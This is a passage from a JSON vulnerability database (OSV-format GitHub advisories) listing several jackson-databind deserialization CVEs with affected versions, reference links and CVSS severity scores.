"https://lists.apache.org/thread.html/r5c3644c97f0434d1ceb48ff48897a67bdbf3baf7efbe7d04625425b3@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5d3d10fdf28110da3f9ac1b7d08d7e252f98d7d37ce0a6bd139a2e4f@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67f4d4c48197454b83d62afbed8bebbda3764e6e3a6e26a848961764@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r707d23bb9ee245f50aa909add0da6e8d8f24719b1278ddd99d2428b2@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r7a0821b44247a1e6c6fe5f2943b90ebc4f80a8d1fb0aa9a8b29a59a2@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7fb123e7dad49af5886cfec7135c0fd5b74e4c67af029e1dc91ba744@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8831b7fa5ca87a1cf23ee08d6dedb7877a964c1d2bd869af24056a63@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-02-25T02:46:33Z", "nvd_published_at": "2020-01-03T04:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h3cw-g4mq-c5x2", "published": "2021-12-09T19:14:51Z", "modified": "2024-02-18T05:30:45.329621Z", "aliases": [ "CVE-2020-24616" ], "summary": "Code Injection in jackson-databind", "details": "This project contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. 
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.6" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.5", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-h3cw-g4mq-c5x2/GHSA-h3cw-g4mq-c5x2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24616" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2814" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3d97153944f7de9c19c1b3637b33d3cf1fbbe4d7" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200904-0006" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2021-04-27T17:38:11Z", "nvd_published_at": "2020-08-25T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h4rc-386g-6m85", "published": "2020-04-23T20:19:02Z", "modified": "2024-03-15T00:46:40.266775Z", "aliases": [ "CVE-2020-11620" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction 
between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-h4rc-386g-6m85/GHSA-h4rc-386g-6m85.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11620" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2682" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/77040d85e3eb6710508e6445640ae1a3d5e60c22" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200511-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-22T21:17:03Z", "nvd_published_at": "2020-04-07T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h592-38cm-4ggp", "published": "2018-10-18T17:42:34Z", "modified": "2024-03-15T01:16:50.905794Z", "aliases": [ "CVE-2017-15095" ], "summary": "jackson-databind vulnerable to deserialization flaw leading to unauthenticated remote code execution", "details": "jackson-databind in versions prior to 2.8.11 and 2.9.4 contains a deserialization flaw which allows an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525, blacklisting additional vulnerable classes.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-h592-38cm-4ggp/GHSA-h592-38cm-4ggp.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3" ], 
"database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-h592-38cm-4ggp/GHSA-h592-38cm-4ggp.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-h592-38cm-4ggp/GHSA-h592-38cm-4ggp.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.2" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-h592-38cm-4ggp/GHSA-h592-38cm-4ggp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15095" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1680" }, { "type": "WEB", 
"url": "https://github.com/FasterXML/jackson-databind/issues/1737" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/a054585e2175ad0882f07bcafedecfac86230f1b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/a3939d36edcc755c8af55bdc1969e0fa8438f9db" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ddfddfba6414adbecaff99684ef66eebd3a92e92" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/e865a7a4464da63ded9f4b1a2328ad85c9ded78b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1aac9b82eee907e0f0c3abbdea723a935" }, { "type": "WEB", "url": "https://github.com/tolbertam/jackson-databind/commit/80566a0f96b2003863f9d8f9ccc3b562001e147b" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3189" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20171214-0003" }, { "type": "WEB", "url": "https://web.archive.org/web/20200401000000*/http://www.securityfocus.com/bid/103880" }, { "type": "WEB", "url": "https://web.archive.org/web/20201221192044/http://www.securitytracker.com/id/1039769" }, { "type": "WEB", "url": "https://www.debian.org/security/2017/dsa-4037" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3190" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0342" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2018:0478" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0479" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0480" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0481" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0576" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0577" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1447" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1448" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1449" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-184", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:38:56Z", "nvd_published_at": "2018-02-06T15:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h822-r4r5-v8jg", "published": "2019-09-23T18:33:25Z", "modified": "2024-07-15T22:00:19.609618Z", "aliases": [ "CVE-2019-14540" ], 
"related": [ "CGA-2vh6-9p6m-f98h" ], "summary": "Polymorphic Typing issue in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10, 2.8.11.5, and 2.6.7.3. It is related to `com.zaxxer.hikari.HikariConfig`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-h822-r4r5-v8jg/GHSA-h822-r4r5-v8jg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-h822-r4r5-v8jg/GHSA-h822-r4r5-v8jg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" 
} ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-h822-r4r5-v8jg/GHSA-h822-r4r5-v8jg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14540" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2410" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2449" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8aaf4ee16bbaf6204731d4770d96ebb34b258cd79b491f9cdd7f2540@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191004-0002" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/blob/master/release-notes/VERSION-2.x" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/0fcef7321095ce0bc597d468d150cff3d647f4cb3aef3bd4d20e1c69@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/40c00861b53bb611dee7d6f35f864aa7d1c1bd77df28db597cbf27e1@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a360b46061c91c5cad789b6c3190aef9b9f223a2b75c9c9f046fe016@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a4f2c9fb36642a48912cdec6836ec00e497427717c5d377f8d7ccce6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ad0d238e97a7da5eca47a014f0f7e81f440ed6bf74a93183825e18b9@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dc6b5cad721a4f6b3b62ed1163894941140d9d5656140fb757505ca0@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e90c3feb21702e68a8c08afce37045adb3870f2bf8223fa403fb93fb@%3Ccommits.hbase.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-09-19T09:23:48Z", "nvd_published_at": "2019-09-15T22:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j823-4qch-3rgm", "published": "2020-06-18T14:44:46Z", "modified": "2024-03-15T00:46:13.294633Z", "aliases": [ "CVE-2020-14060" ], "summary": 
"Deserialization of untrusted data in Jackson Databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.5" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-j823-4qch-3rgm/GHSA-j823-4qch-3rgm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14060" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2688" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ac7232e3f9004bdb4f11dcb5bc6c1fadf074f5f7" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200702-0003" }, { "type": "WEB", "url": 
"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-18T13:05:54Z", "nvd_published_at": "2020-06-14T21:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jjjh-jjxp-wpff", "published": "2022-10-03T00:00:31Z", "modified": "2024-10-22T05:28:54.705123Z", "aliases": [ "CGA-cr64-vww2-xpq8", "CVE-2022-42003" ], "related": [ "CGA-9gmq-c996-778j", "CGA-fqmv-h753-pwr7", "CGA-jv4g-m8ph-wxx4", "CGA-qh53-92m3-qxq2" ], "summary": "Uncontrolled Resource Consumption in Jackson-databind", "details": "In FasterXML jackson-databind 2.4.0-rc1 until 2.12.7.1 and in 2.13.x before 2.13.4.2 resource exhaustion can occur because of a lack 